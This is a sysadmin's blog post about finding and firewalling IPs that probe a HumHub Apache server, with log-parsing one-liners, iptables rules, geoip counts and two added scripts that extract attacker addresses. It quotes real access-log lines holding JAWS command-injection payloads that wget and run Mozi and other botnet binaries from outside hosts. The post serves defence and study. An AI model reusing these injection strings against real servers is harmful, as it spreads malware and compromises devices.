List of IPs trying to probe the .well-known file

So I wrote a script:

# zgrep ".well-known" /var/log/apache2/error.humhub.log.*gz | sed 's/:/ /g' | awk '{print $14}' | sort -n | uniq | awk '{print "iptables -A INPUT -s " $1 " -j DROP "}'
iptables -A INPUT -s 80.82.77.139 -j DROP 
iptables -A INPUT -s 80.82.77.33 -j DROP 
iptables -A INPUT -s 125.64.94.138 -j DROP 
iptables -A INPUT -s 185.142.236.35 -j DROP 
iptables -A INPUT -s 185.142.236.40 -j DROP 
iptables -A INPUT -s 185.142.236.43 -j DROP
# zgrep ".well-known" /var/log/apache2/error.humhub.log.*gz | sed 's/:/ /g' | awk '{print $14}' | sort -n | uniq | awk '{print "iptables -A INPUT -s " $1 " -j DROP "}' > script_filter_scan_well-know.bash
# echo "iptables-save > /etc/iptables/rules.v4" >> script_filter_scan_well-know.bash
# chmod +x script_filter_scan_well-know.bash
# ./script_filter_scan_well-know.bash

And there you go, 6 new IPs filtered... almost all of them coming from the Netherlands... Misery.

Which countries do the IPs in my /etc/iptables/rules.v4 file come from?

Easy, just run this command:

# grep "DROP" /etc/iptables/rules.v4 | awk '{print $4}' | sed 's/\// /g' | awk '{print $1}' | xargs -n 1 geoiplookup | sort | uniq -c | sort -n | sed -r 's/ GeoIP Country Edition://g'
      1 AT, Austria
      1 BR, Brazil
      1 CZ, Czech Republic
      1 GR, Greece
      1 IE, Ireland
      1 JP, Japan
      1 PH, Philippines
      1 TT, Trinidad and Tobago
      1 UG, Uganda
      2 ID, Indonesia
      2 IR, Iran, Islamic Republic of
      2 IT, Italy
      2 MX, Mexico
      2 MY, Malaysia
      2 SG, Singapore
      2 TR, Turkey
      2 TW, Taiwan
      3 CA, Canada
      3 GB, United Kingdom
      3 NL, Netherlands
      3 VN, Vietnam
      4 DE, Germany
      4 EG, Egypt
      4 FR, France
      4 KR, Korea, Republic of
      5 RU, Russian Federation
      9 IN, India
     11 IP Address not found
     28 CN, China
     43 US, United States

The US top the list... Misery. Note that there are IPs in France that I am filtering:

Location France
Reputation 86 %
Anonymity None detected
Usage Allocated
Source RIPE NCC
Hostname 134.119.189.155 => VELIANET-FR-PUSHPENDERCHUHAN

Location France
Reputation 86 %
Anonymity None detected
Usage Allocated
Source RIPE NCC
Hostname ip28.ip-51-210-137.eu => StarkRDP Service

Location France
Reputation 86 %
Anonymity None detected
Usage Allocated
Source RIPE NCC
Hostname 151.106.8.41 => VELIANET-FR-CYBERGHOSTSRL

List of IPs trying to probe .env (environment variables)

Here is the command and the list of IPs scanning for .env:

# zgrep ".env" /var/log/apache2/error.humhub.log.*gz | sed 's/:/ /g' | awk '{print $14}' | sort -n | uniq -c
      1 2.57.122.53    
      2 3.19.213.88
      3 20.199.123.240
      2 20.68.241.118
      2 23.101.199.109
      1 35.202.212.64
      2 40.121.11.29
      1 40.87.87.96
      1 40.89.150.92
      1 45.77.214.38
      1 51.141.166.84
      2 51.210.137.28
      2 52.149.128.42
      1 52.175.210.216
      1 52.249.196.150
      1 80.241.212.242
      2 104.154.217.152
      2 104.198.135.4
      2 108.59.10.20
      1 115.78.14.240
      1 118.101.194.141
      1 128.31.0.13
      2 134.119.189.155
      1 144.202.53.77
      1 148.64.121.254
      2 149.28.84.31
      1 157.245.77.151
      1 172.93.128.215
      1 178.128.104.205
      1 189.203.106.65
      1 190.83.155.186
      1 192.46.223.53
      2 193.111.76.162
      1 194.116.73.192
      1 199.117.154.162
      1 210.66.16.184
      1 212.154.7.246

Properties of IP address 2.57.122.53

Location Netherlands
Reputation 71 %
Anonymity None detected
Usage Allocated
Source RIPE NCC
Hostname 2.57.122.53

Properties of IP address 3.19.213.88

Location United States
Reputation 100 %
Anonymity None detected
Usage Allocated
Source ARIN
Hostname ec2-3-19-213-88.us-east-2.compute.amazonaws.com

Some of these IPs have a reputation of 100%... Misery.
To create the script:

# zgrep ".env" /var/log/apache2/error.humhub.log.*gz | sed 's/:/ /g' | awk '{print $14}' | sort -n | uniq | awk '{print "iptables -A INPUT -s " $1 " -j DROP "}' > script_filter_scan_env.bash
# echo "iptables-save > /etc/iptables/rules.v4" >> script_filter_scan_env.bash
# chmod +x script_filter_scan_env.bash
# ./script_filter_scan_env.bash
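Added example, not the post's script. The two one-liners above, the one for .well-known and the one for .env, pick the client IP by field number after turning every ":" into a space, which breaks as soon as the ErrorLogFormat changes, and they grep with an unescaped "." (as a regex, ".env" also matches any "env" preceded by one character, e.g. "/environment.php"). They append the DROP rules to the end of INPUT, so an earlier ACCEPT for port 80/443 would win, and they re-add addresses that are already in rules.v4 every time they run. The version below pulls the address out of the "[client IP:port]" token of the Apache 2.4 error log, matches the path as a fixed string, skips addresses already saved by iptables-save, and puts the rules in a dedicated chain (SCANBLOCK, a name assumed for this example) hooked at the top of INPUT. The sample log lines are constructed, not taken from the server. One caveat before running it on .well-known: Let's Encrypt's HTTP-01 validators also fetch /.well-known/acme-challenge/..., and a failed renewal would put their addresses in exactly this error log, so review the generated list before blocking.

```shell
#!/bin/bash
# Added example, not the post's script: build the DROP list from Apache 2.4
# error-log lines without depending on field positions.
# Assumptions: default ErrorLogFormat ("[client IP:port]"), iptables-save
# output in $RULES, and a dedicated chain named SCANBLOCK (name chosen for
# this example). Only IPv4 clients are handled.

RULES=${RULES:-/etc/iptables/rules.v4}   # file written by iptables-save
CHAIN=SCANBLOCK                          # assumed chain name

# Constructed sample lines (Apache 2.4 error-log format, not from the server).
SAMPLE_LOG='[Mon May 31 06:04:31.101010 2021] [core:info] [pid 1234:tid 5678] [client 80.82.77.139:51234] AH00128: File does not exist: /var/www/humhub/.well-known
[Mon May 31 06:05:02.101010 2021] [core:info] [pid 1234:tid 5678] [client 80.82.77.139:51240] AH00128: File does not exist: /var/www/humhub/.well-known/security.txt
[Mon May 31 06:06:10.101010 2021] [core:info] [pid 1234:tid 5678] [client 185.142.236.35:4000] AH00128: File does not exist: /var/www/humhub/.well-known
[Mon May 31 06:07:44.101010 2021] [core:info] [pid 1234:tid 5678] [client 185.142.236.40:4100] AH00128: File does not exist: /var/www/humhub/.env
[Mon May 31 06:08:00.101010 2021] [core:info] [pid 1234:tid 5678] [client 10.0.0.5:40000] AH00128: File does not exist: /var/www/humhub/favicon.ico'

# extract_ips PATH: read error-log text on stdin and print the unique client
# IPv4 addresses of the lines that mention PATH. grep -F keeps "." literal, so
# ".env" cannot match "/environment.php" the way the regex ".env" does.
extract_ips() {
    grep -F -- "$1" \
      | grep -oE 'client ([0-9]{1,3}\.){3}[0-9]{1,3}' \
      | awk '{print $2}' \
      | LC_ALL=C sort -u
}

# already_blocked IP: true if the saved rule set already drops IP
# (iptables-save writes single hosts as "-s IP/32").
already_blocked() {
    [ -r "$RULES" ] || return 1
    grep -qF -- "-s $1/32 " "$RULES"
}

# gen_rules PATH: one iptables command per offending IP not yet in $RULES.
gen_rules() {
    extract_ips "$1" | while read -r ip; do
        already_blocked "$ip" || printf 'iptables -A %s -s %s -j DROP\n' "$CHAIN" "$ip"
    done
}

# build_script PATH: complete script. The chain is inserted at position 1 of
# INPUT so the DROPs are evaluated before any ACCEPT for port 80/443; appending
# to INPUT with -A, as the post does, only works if nothing above accepts first.
build_script() {
    printf '#!/bin/bash\nset -e\n'
    printf 'iptables -N %s 2>/dev/null || true\n' "$CHAIN"
    printf 'iptables -C INPUT -j %s 2>/dev/null || iptables -I INPUT 1 -j %s\n' "$CHAIN" "$CHAIN"
    gen_rules "$1"
    printf 'iptables-save > %s\n' "$RULES"
}

# Demonstration on the sample. On the server:
#   zcat /var/log/apache2/error.humhub.log.*gz | build_script .well-known > script_filter_scan_well-know.bash
printf '%s\n' "$SAMPLE_LOG" | build_script .well-known
```

Once the list grows to a few hundred addresses, an ipset (`ipset create scanners hash:ip`, then a single `iptables -I INPUT -m set --match-set scanners src -j DROP`) is cheaper than one rule per host and is easier to dedupe, but it needs `ipset save` next to `iptables-save` to survive a reboot.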

List of IPs making GET /shell attacks

Here is the list:

61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.45.11.127 - - [31/May/2021:06:52:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.45.11.127:48083/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
182.121.231.1 - - [21/May/2021:04:07:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.121.231.1:59816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [21/May/2021:14:34:29 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
223.149.149.208 - - [21/May/2021:22:16:38 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
103.203.72.91 - - [20/May/2021:06:12:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
119.123.236.177 - - [20/May/2021:15:52:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.123.236.177:38918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
117.241.51.177 - - [18/May/2021:17:30:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.241.51.177:45448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.5.37.175 - - [18/May/2021:19:41:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.5.37.175:46657/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
59.97.193.131 - - [17/May/2021:06:05:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.193.131:57363/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-"
59.63.206.200 - - [26/May/2021:00:59:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://101.232.115.188:57082/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
114.33.156.230 - - [26/May/2021:09:57:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.33.156.230:59246/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"
209.141.33.232 - - [25/May/2021:02:00:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:03:15:26 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:05:17:24 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [23/May/2021:11:11:12 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"

Note that 45.14.149.244 is in Romania and 27.45.11.127 is in China.

Summary:

iptables -A INPUT -s 45.14.149.244 -j DROP
iptables -A INPUT -s 209.141.33.232 -j DROP
iptables -A INPUT -s 68.150.109.112 -j DROP
iptables -A INPUT -s 114.33.156.230 -j DROP
iptables -A INPUT -s 59.63.206.200 -j DROP
iptables -A INPUT -s 59.97.193.131 -j DROP
iptables -A INPUT -s 117.241.51.177 -j DROP
iptables -A INPUT -s 119.123.236.177 -j DROP
iptables -A INPUT -s 27.5.37.175 -j DROP
iptables -A INPUT -s 27.45.11.127 -j DROP
iptables -A INPUT -s 61.242.40.137 -j DROP
iptables -A INPUT -s 182.121.231.1 -j DROP
iptables-save > /etc/iptables/rules.v4
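Added example, not part of the post. The summary above was typed by hand, and it leaves out three of the source IPs that appear in the log excerpt (103.203.72.91, 138.204.132.98, 223.149.149.208) while blocking only one of the hosts named in the injected commands (45.14.149.244; 212.192.241.127, 185.172.111.214 and 101.232.115.188 are not in the list). These "/shell?cd+/tmp;..." requests are the JAWS web-server command-injection probe (the "jaws" argument at the end of the payload) that Mozi and similar IoT botnets spray at every HTTP server; Apache answers 404/400, so the useful output is the two address sets. The script below reads access-log lines and extracts both: source IPs from the first field, payload hosts from whatever follows "wget+", ignoring private addresses such as the 192.168.1.1 that one Mozi variant hard-codes. SCANBLOCK is an assumed chain name, the access-log path in the comment is assumed, and the four sample lines are copied from the log excerpt above.

```shell
#!/bin/bash
# Added example, not the post's summary: from Apache access-log lines carrying
# the "GET /shell?cd+/tmp;..." probe, extract (1) the source IPs and (2) the
# hosts the injected command would download its payload from. Private and
# loopback payload hosts (one Mozi variant hard-codes 192.168.1.1) are dropped:
# they are the victim's LAN, not something to firewall on a server.
# CHAIN is an assumed chain name; only IPv4 literals are handled, so a payload
# URL that uses a domain name would be missed.

CHAIN=SCANBLOCK

# Four lines copied from the log excerpt in the post.
SAMPLE_ACCESS='61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-"
68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"'

# shell_sources: unique client IPs (first field of the combined log format)
# of the lines that carry the /shell probe.
shell_sources() {
    grep -F '"GET /shell?' | awk '{print $1}' | LC_ALL=C sort -u
}

# payload_hosts: unique routable IPs that follow "wget+" in the injected
# command. Accepts "wget+http://", the "http:/\\/" obfuscation, an optional
# space after "wget+" and a bare host with no scheme.
payload_hosts() {
    grep -F '"GET /shell?' \
      | grep -oE 'wget\+ ?(http:[/\\]+)?([0-9]{1,3}\.){3}[0-9]{1,3}' \
      | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}$' \
      | grep -vE '^(10\.|127\.|169\.254\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)' \
      | LC_ALL=C sort -u
}

# block_rules: iptables commands for both sets, deduplicated, in $CHAIN.
block_rules() {
    log=$(cat)
    { printf '%s\n' "$log" | shell_sources; printf '%s\n' "$log" | payload_hosts; } \
      | LC_ALL=C sort -u \
      | awk -v chain="$CHAIN" '{print "iptables -A " chain " -s " $1 " -j DROP"}'
}

# Demonstration on the sample. On the server (log path assumed):
#   zcat /var/log/apache2/access.humhub.log.*gz | block_rules
printf '%s\n' "$SAMPLE_ACCESS" | block_rules
```

Dropping the payload hosts on INPUT mirrors what the summary does with 45.14.149.244; it is mostly hygiene, since an Apache box that returned 404 never fetched anything from them, and the more useful thing to do with that second set is to report it to the hosting provider's abuse contact.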

Misery.